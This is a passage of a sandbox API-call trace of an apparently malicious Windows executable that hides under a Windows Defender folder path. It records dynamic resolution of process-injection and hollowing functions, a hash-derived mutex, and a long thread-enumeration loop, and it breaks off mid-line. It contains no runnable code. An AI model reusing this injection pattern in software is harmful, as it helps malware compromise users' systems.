lpProcName="GetCurrentThreadId") returned 0x76c31450 [0170.052] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0170.053] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessId") returned 0x76c311f8 [0170.053] GetProcAddress (hModule=0x76c20000, lpProcName="WriteProcessMemory") returned 0x76c4d9e0 [0170.053] GetProcAddress (hModule=0x76c20000, lpProcName="SuspendThread") returned 0x76c57d7e [0170.053] GetProcAddress (hModule=0x76c20000, lpProcName="ResumeThread") returned 0x76c343ef [0170.053] GetProcAddress (hModule=0x76c20000, lpProcName="RtlZeroMemory") returned 0x77193c10 [0170.053] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32First") returned 0x76cb5b93 [0170.053] GetProcAddress (hModule=0x76c20000, lpProcName="CreateRemoteThread") returned 0x76cb416b [0170.053] GetProcAddress (hModule=0x76c20000, lpProcName="OpenProcess") returned 0x76c31986 [0170.053] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcessHeap") returned 0x76c314e9 [0170.053] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualFree") returned 0x76c3186e [0170.053] GetProcAddress (hModule=0x76c20000, lpProcName="Process32First") returned 0x76c58ae7 [0170.053] GetProcAddress (hModule=0x76c20000, lpProcName="HeapFree") returned 0x76c314c9 [0170.053] GetProcAddress (hModule=0x76c20000, lpProcName="HeapAlloc") returned 0x7715e026 [0170.054] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualQuery") returned 0x76c3445a [0170.054] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenA") returned 0x76c35a4b [0170.054] GetProcAddress (hModule=0x76c20000, lpProcName="IsWow64Process") returned 0x76c3195e [0170.054] GetProcAddress (hModule=0x76c20000, lpProcName="HeapReAlloc") returned 0x77171f6e [0170.054] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0170.054] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0170.054] GetProcAddress (hModule=0x74d40000, lpProcName="CryptReleaseContext") returned 0x74d4e124 [0170.054] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0170.054] GetProcAddress (hModule=0x74d40000, lpProcName="CryptGetHashParam") returned 0x74d4df7e [0170.054] GetProcAddress (hModule=0x74d40000, lpProcName="CryptCreateHash") returned 0x74d4df4e [0170.054] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0170.054] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0170.070] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0170.070] GetProcAddress (hModule=0x759b0000, lpProcName="CryptBinaryToStringA") returned 0x759ea8c5 [0170.070] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74850000 [0170.078] GetProcAddress (hModule=0x74850000, lpProcName="DnsFree") returned 0x7485436b [0170.078] GetProcAddress (hModule=0x74850000, lpProcName="DnsQuery_W") returned 0x7486572c [0170.078] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0170.078] GetProcAddress (hModule=0x77130000, lpProcName="NtCreateSection") returned 0x7714ff94 [0170.079] GetProcAddress (hModule=0x77130000, lpProcName="NtSetInformationProcess") returned 0x7714fb18 [0170.079] GetProcAddress (hModule=0x77130000, lpProcName="NtMapViewOfSection") returned 0x7714fc40 [0170.079] GetProcAddress (hModule=0x77130000, lpProcName="LdrProcessRelocationBlock") returned 0x771de9cf [0170.079] GetProcAddress (hModule=0x77130000, lpProcName="NtUnmapViewOfSection") returned 0x7714fc70 [0170.079] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0170.079] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfW") returned 0x74f7e061 [0170.079] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfA") returned 0x74f6ae5f [0170.079] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x747f0000 [0170.082] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReadData") returned 0x747fcb9e [0170.082] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpAddRequestHeaders") returned 0x74809dfb [0170.082] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCrackUrl") returned 0x7480953a [0170.082] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetProxyForUrl") returned 0x747fd5dc [0170.082] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpenRequest") returned 0x747f4aea [0170.082] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpen") returned 0x747f58b9 [0170.082] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCloseHandle") returned 0x747f2c01 [0170.083] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSendRequest") returned 0x747f79bd [0170.083] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetIEProxyConfigForCurrentUser") returned 0x7480257e [0170.083] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSetOption") returned 0x747f3f6c [0170.083] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReceiveResponse") returned 0x747fb262 [0170.083] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpConnect") returned 0x747fd9f5 [0170.083] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0170.083] GetProcAddress (hModule=0x75bc0000, lpProcName=0xc) returned 0x75bcb131 [0170.083] GetProcAddress (hModule=0x75bc0000, lpProcName=0x5) returned 0x75bc7147 [0170.083] GetProcAddress (hModule=0x75bc0000, lpProcName=0xf) returned 0x75bc2d8b [0170.083] VirtualProtect (in: lpAddress=0x70000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x1fff8c4 | out: lpflOldProtect=0x1fff8c4*=0x40) returned 1 [0170.084] VirtualProtect (in: lpAddress=0x70000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x1fff8c4 | out: lpflOldProtect=0x1fff8c4*=0x4) returned 1 [0170.084] VirtualQuery (in: lpAddress=0x80016, lpBuffer=0x1fff8bc, dwLength=0x1c | out: lpBuffer=0x1fff8bc*(BaseAddress=0x80000, AllocationBase=0x80000, AllocationProtect=0x40, RegionSize=0x1000, State=0x1000, Protect=0x40, Type=0x40000)) returned 0x1c [0170.084] GetProcessHeap () returned 0x6c0000 [0170.084] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x364) returned 0x6e0568 [0170.084] RtlMoveMemory (in: Destination=0x6e0568, Source=0x80016, Length=0x363 | out: Destination=0x6e0568) [0170.085] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x80016) returned 0x0 [0170.085] GetCurrentProcessId () returned 0x7a4 [0170.085] GetProcessHeap () returned 0x6c0000 [0170.085] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x105) returned 0x6e08d8 [0170.085] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x6e08d8, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Windows Defender\\birth bean.exe" (normalized: "c:\\program files (x86)\\windows defender\\birth bean.exe")) returned 0x36 [0170.085] GetProcessHeap () returned 0x6c0000 [0170.085] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x105) returned 0x6e09e8 [0170.085] GetCurrentProcessId () returned 0x7a4 [0170.085] wsprintfA (in: param_1=0x6e09e8, param_2="%s%d%d%d" | out: param_1="C:\\Program Files (x86)\\Windows Defender\\birth bean.exe37084212419563") returned 68 [0170.085] CryptAcquireContextA (in: phProv=0x1fff8c0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x1fff8c0*=0x6e0b38) returned 1 [0170.191] CryptCreateHash (in: hProv=0x6e0b38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x1fff8c4 | out: phHash=0x1fff8c4) returned 1 [0170.191] lstrlenA (lpString="C:\\Program Files (x86)\\Windows Defender\\birth bean.exe37084212419563") returned 68 [0170.191] CryptHashData (hHash=0x6e1450, pbData=0x6e09e8, dwDataLen=0x44, dwFlags=0x0) returned 1 [0170.191] CryptGetHashParam (in: hHash=0x6e1450, dwParam=0x2, pbData=0x1fff8b0, pdwDataLen=0x1fff8c8, dwFlags=0x0 | out: pbData=0x1fff8b0, pdwDataLen=0x1fff8c8) returned 1 [0170.191] wsprintfA (in: param_1=0x6e09e8, param_2="%02X" | out: param_1="87") returned 2 [0170.191] wsprintfA (in: param_1=0x6e09ea, param_2="%02X" | out: param_1="A7") returned 2 [0170.191] wsprintfA (in: param_1=0x6e09ec, param_2="%02X" | out: param_1="8A") returned 2 [0170.191] wsprintfA (in: param_1=0x6e09ee, param_2="%02X" | out: param_1="FC") returned 2 [0170.191] wsprintfA (in: param_1=0x6e09f0, param_2="%02X" | out: param_1="41") returned 2 [0170.191] wsprintfA (in: param_1=0x6e09f2, param_2="%02X" | out: param_1="F1") returned 2 [0170.191] wsprintfA (in: param_1=0x6e09f4, param_2="%02X" | out: param_1="AF") returned 2 [0170.191] wsprintfA (in: param_1=0x6e09f6, param_2="%02X" | out: param_1="A7") returned 2 [0170.191] wsprintfA (in: param_1=0x6e09f8, param_2="%02X" | out: param_1="1F") returned 2 [0170.191] wsprintfA (in: param_1=0x6e09fa, param_2="%02X" | out: param_1="9B") returned 2 [0170.191] wsprintfA (in: param_1=0x6e09fc, param_2="%02X" | out: param_1="4D") returned 2 [0170.191] wsprintfA (in: param_1=0x6e09fe, param_2="%02X" | out: param_1="8F") returned 2 [0170.191] wsprintfA (in: param_1=0x6e0a00, param_2="%02X" | out: param_1="2B") returned 2 [0170.191] wsprintfA (in: param_1=0x6e0a02, param_2="%02X" | out: param_1="8B") returned 2 [0170.191] wsprintfA (in: param_1=0x6e0a04, param_2="%02X" | out: param_1="64") returned 2 [0170.192] wsprintfA (in: param_1=0x6e0a06, param_2="%02X" | out: param_1="DA") returned 2 [0170.192] CryptDestroyHash (hHash=0x6e1450) returned 1 [0170.192] CryptReleaseContext (hProv=0x6e0b38, dwFlags=0x0) returned 1 [0170.192] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="87A78AFC41F1AFA71F9B4D8F2B8B64DA") returned 0x80 [0170.192] GetLastError () returned 0x0 [0170.192] Sleep (dwMilliseconds=0x1f4) [0170.735] GetCurrentProcessId () returned 0x7a4 [0170.735] GetCurrentThreadId () returned 0x5e8 [0170.736] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x88 [0170.738] Thread32First (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.738] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.739] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.739] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.739] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.739] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.740] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.740] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.740] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.741] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.741] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.741] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.741] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.742] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.742] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.742] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.743] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.743] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.743] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.744] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.744] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.744] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.745] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.745] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.745] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.745] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.746] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.746] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.746] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.747] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.747] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.747] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.748] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.748] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.748] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.748] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.749] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.749] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.749] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.750] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.750] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.750] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.751] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.751] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.751] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.752] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.752] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.752] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.752] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.753] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.753] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.753] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.754] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.754] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.754] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.755] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.755] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.755] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.755] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.756] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.756] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.756] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.757] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.757] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.757] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.758] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.758] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.758] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.758] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.759] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.759] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.759] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.760] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.760] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.760] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.761] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.761] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.761] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.761] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.762] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.762] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.762] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.763] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.763] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.763] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.764] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.764] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.764] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.764] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.765] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.765] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.765] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.766] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.766] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.766] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.767] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.767] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.767] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.767] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.768] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.768] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.768] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.769] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.769] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.769] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.770] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.770] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.770] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.771] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.771] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.771] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.771] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.772] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.772] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.772] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.773] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.773] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.773] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.774] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.774] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.774] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.774] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.775] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.775] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.775] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.776] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.776] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.776] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.776] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.777] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.777] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.777] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.777] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.778] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.778] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.778] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.779] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.779] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.779] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.780] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.780] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.780] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.781] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.781] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.781] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.781] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.810] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.811] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.811] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.811] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.812] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.812] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.812] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.812] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.813] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.813] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.813] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.814] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.814] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.814] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.814] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.815] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.815] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.815] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.815] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.816] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.816] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.816] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.817] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.817] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.817] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.817] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.818] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.818] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.818] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.819] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.819] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.819] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.819] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.820] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.820] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.820] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.820] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.821] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.821] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.821] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.822] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.822] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.822] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.822] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.823] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.823] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.823] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.824] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.824] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.824] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.824] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.825] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.825] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.825] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.826] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.826] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.826] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.826] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.827] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.827] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.827] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.828] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.828] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.828] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.829] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.829] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.829] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.830] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.830] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.830] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.830] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.831] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.831] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.831] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.832] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.832] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.832] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.832] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.833] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.833] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.833] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.834] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.834] Thread32Next (hSnapshot=0x88, lpte=0x1fff8b4) returned 1 [0170.834] Thread32Next 